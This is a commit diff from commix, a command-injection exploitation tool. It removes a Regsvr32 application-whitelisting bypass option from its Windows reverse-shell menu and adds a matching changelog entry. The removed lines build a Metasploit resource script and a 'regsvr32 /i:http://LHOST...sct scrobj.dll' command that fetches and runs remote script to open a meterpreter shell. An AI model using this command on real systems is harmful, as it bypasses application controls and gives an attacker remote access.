The "Regsvr32.exe application whitelisting bypass" attack vector has been removed.

stasinopoulos · stasinopoulos · commit 05eeb88b3d90 · 2021-07-09T08:43:40.000+03:00
diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md
@@ -1,4 +1,5 @@
 ## Version 3.3 (TBA)
+* Removed: The "Regsvr32.exe application whitelisting bypass" attack vector has been removed.
 * Updated: Minor update regarding web delivery script (i.e. Python meterpreter reverse TCP shell).
 * Replaced: The `--backticks` switch has been replaced with "backticks.py" tamper script.
 * Added: New tamper script "backticks.py" that uses backticks instead of "$()", for commands substitution. (for *nix targets).
diff --git a/src/core/shells/reverse_tcp.py b/src/core/shells/reverse_tcp.py
@@ -512,7 +512,6 @@ def other_reverse_shells(separator):
 ---[ """ + Style.BRIGHT + Fore.BLUE + """Powershell injection attacks""" + Style.RESET_ALL + """ ]---
 Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use shellcode injection with native x86 shellcode.
 Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' to use TrustedSec's Magic Unicorn.
-Type '""" + Style.BRIGHT + """3""" + Style.RESET_ALL + """' to use Regsvr32.exe application whitelisting bypass.
 \ncommix(""" + Style.BRIGHT + Fore.RED + """windows_meterpreter_reverse_tcp""" + Style.RESET_ALL + """) > """)
 
           if any(option in windows_reverse_shell.lower() for option in settings.SHELL_OPTIONS): 
@@ -522,8 +521,6 @@ def other_reverse_shells(separator):
             output = "powershell_attack.rc"
           elif windows_reverse_shell == '2' :
             output = "powershell_attack.txt"
-          elif windows_reverse_shell == '3' :
-            output = "regsvr32_applocker_bypass_server.rc"
           else:
             err_msg = "The '" + windows_reverse_shell + "' option, is not valid."  
             print(settings.print_error_msg(err_msg))
@@ -603,24 +600,6 @@ def other_reverse_shells(separator):
             except:
               print(settings.SINGLE_WHITESPACE)
             break
-
-          # Regsvr32.exe application whitelisting bypass
-          elif windows_reverse_shell == '3':
-            with open(output, 'w+') as filewrite:
-              filewrite.write("use exploit/windows/misc/regsvr32_applocker_bypass_server\n"
-                              "set payload " + payload + "\n"
-                              "set lhost " + str(settings.LHOST) + "\n"
-                              "set lport " + str(settings.LPORT) + "\n"
-                              "set srvport " + str(settings.SRVPORT) + "\n"
-                              "set uripath " + settings.URIPATH + "\n"
-                              "exploit\n\n")
-            if not settings.TARGET_OS == "win":
-              windows_only_attack_vector()
-              continue
-            else:
-              other_shell = "regsvr32 /s /n /u /i:http://" + str(settings.LHOST) + ":" + str(settings.SRVPORT) + settings.URIPATH +".sct scrobj.dll"
-              msf_launch_msg(output)
-              break
       break
     
     # Web delivery script
diff --git a/src/utils/settings.py b/src/utils/settings.py
@@ -216,7 +216,7 @@ def sys_argv_errors():
 DESCRIPTION = "The command injection exploiter"
 AUTHOR  = "Anastasios Stasinopoulos"
 VERSION_NUM = "3.3"
-REVISION = "48"
+REVISION = "49"
 STABLE_RELEASE = False
 if STABLE_RELEASE:
   VERSION = "v" + VERSION_NUM + "-stable"

Original file line number	Diff line number	Diff line change
`@@ -1,4 +1,5 @@`
`1`	`1`	`## Version 3.3 (TBA)`
	`2`	`+* Removed: The "Regsvr32.exe application whitelisting bypass" attack vector has been removed.`
`2`	`3`	`* Updated: Minor update regarding web delivery script (i.e. Python meterpreter reverse TCP shell).`
`3`	`4`	* Replaced: The `--backticks` switch has been replaced with "backticks.py" tamper script.
`4`	`5`	`* Added: New tamper script "backticks.py" that uses backticks instead of "$()", for commands substitution. (for *nix targets).`